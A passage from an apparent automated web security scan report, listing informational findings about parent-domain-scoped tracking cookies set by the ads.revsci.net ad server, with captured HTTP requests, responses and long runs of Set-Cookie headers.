Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs="MLtXrl8utl9nIAH3UpzIJlAWnrFYGbJvOWDi153GQb2cZxqKMlwiAWoJ5Yu9t3o3RMAlOi1iudA1qvDChUqCLpGZorRdTiZLCmu4FMR9FpglQcv0Y1wqRDvlSp+dnJtWb4pctVLY2kxSXEJ6h1S7KFlnlFhQJIHSkSQTXVd1wA8DYdU/cG7AYCLy9/dLqfyLTnaeh3NmViaoJIybWwWmlkBFss+7oIy0C5/dZoP1eijxhsUGplHBN8ZOLDaEyRA+gCdTCOCL7EINN3DAxLHHSdt5dg/i/I7/F0rRXTyOJHnaBHf4RLX0Ihr8i1qNqEYac/8uPOw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:22 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.8. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers with Domain=.revsci.net in the response below). A cookie scoped this way is sent to, and can be overwritten by, every host under revsci.net, not only the host that issued it. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnOAIY1E3idJy9v6s4JGVJ5ObQ+5teuL11ZXhNSsXZ156dYZ/zFzx7/QK2StGwrzmf3c8cmJlrbiousVEvoToDEFJ1YaJsDm6tTMw+CAf64AC6eY9EN7eZdhTC+Ck513ESp294zWo7X0k04/Z7TVzJyAZ/W3jznJIUEqdU1MvgEn3LxKvvcjO0hJ7zokiDJZC1kr7s8qFNMcCFyZMPGAQ21/szK332YYSpqr4wbbKgSf1iqx1DkHEuFxdbdIDuOLV/7HDr0NSI9lfUz1DeVzP0JmoTPtwzgb8RnYjUpP9j7MJuO/1BHimcP7e6eWWC22CTIo5O5ghe229XFc53R3p/6IVPDoJ0f2o2u6pe4sqNRk8f+ktcpgyfjzEvgM+MPva8Ei9Xo9xSqcZpt0yu9Z/iFCoapf4P2ym1XfY/7kJ6+WWK/OTKSYX5lvT0qD1gmoFUuVLwYl2vhq4jUI9wfESh7XeADVSQEPzaVQMVoBmPTFYHzyc6qCrbDTXvN37EmmLnSUn8n8LX6/nkfMoPz08xYhN15l7cEJAO7eWxfAqYCK5bypxxpTHvd+4cQYCnS8hpP9EFHp7nkU4TLIA7QK/PlvTtIyPuP9fr+OoLZRcVteNeKwbfnhmTiCo7n4X2JZMQxdDny4vMVaWpaHblOeXc8jUsd1A0fax/8Cjpuqt+xYazn2DsB1aqMrYPglKJmcXXOzMrNMqOAD6AkPkBINEu3pbtyG0TWrs76ByH904QwXmVXuhHtLigqnqLxpAOGpU61RvW300ARPPLydRznVLLo3zM6+jS3AbPjds3pX2bLumlDwKTASho04dsVjnTmgsFlZH91XIdGf4XMWshXYvVc4vm04tg0PjkA6w/91baJncnmZLxWvccwNe1Re1P4QUSf9U="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:50:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.9. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers with Domain=.revsci.net in the response below). A cookie scoped this way is sent to, and can be overwritten by, every host under revsci.net, not only the host that issued it. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
